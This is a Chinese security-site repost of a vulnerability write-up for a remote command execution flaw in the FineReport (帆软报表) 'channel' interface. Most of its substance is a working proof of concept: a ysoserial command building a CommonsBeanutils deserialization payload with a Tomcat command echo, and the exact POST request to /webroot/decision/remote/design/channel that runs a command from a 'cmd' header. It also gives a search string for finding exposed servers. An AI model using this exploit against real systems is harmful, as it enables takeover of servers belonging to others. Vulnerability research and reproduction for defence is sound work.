帆软报表 channel 远程命令执行漏洞

admin

102508
文章

87
评论

2024年1月22日15:23:33评论103 views字数 354阅读1分10秒阅读模式

漏洞描述

帆软报表 channel 接口存在远程命令执行漏洞, 攻击者通过漏洞可以获取服务器权限，攻击服务器

漏洞影响

帆软报表

网络测绘

"Powered by 帆软"

漏洞复现

登陆页面

帆软报表 channel 远程命令执行漏洞

验证POC

java -jar ysoserial-1.5-su18-all.jar -g CommonsBeanutils1183NOCC -p 'EX-TomcatEcho' -ch "cmd" > fine10.binPOST /webroot/decision/remote/design/channel HTTP/1.1Content-Type: application/jsonHost: cmd: idConnection: close{{gzip(file(fine10.bin))}}

帆软报表 channel 远程命令执行漏洞

原文始发于微信公众号（Ots安全）：帆软报表 channel 远程命令执行漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2024年1月22日15:23:33
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
帆软报表 channel 远程命令执行漏洞https://cn-sec.com/archives/2418213.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

帆软报表 channel 远程命令执行漏洞

CVE-2024-4040

Craft CMS 远程代码执行漏洞复现（附nuclei POC）

漏洞预警 | Google Chrome堆缓冲区溢出漏洞

漏洞预警 | GeoNode请求伪造漏洞

漏洞预警 | Docker Desktop增强容器隔离限制绕过漏洞

漏洞预警 | D-Link D-View 8 硬编码密钥漏洞

(CVE-2023-30591) NodeBB 预身份验证拒绝服务

CVE-2023-41081：Apache Tomcat 连接器中的高严重性漏洞

禅道项目管理系统身份认证绕过[漏洞复现]

LiveGBS-save-任意用户添加漏洞复现

发表评论

在线咨询

微信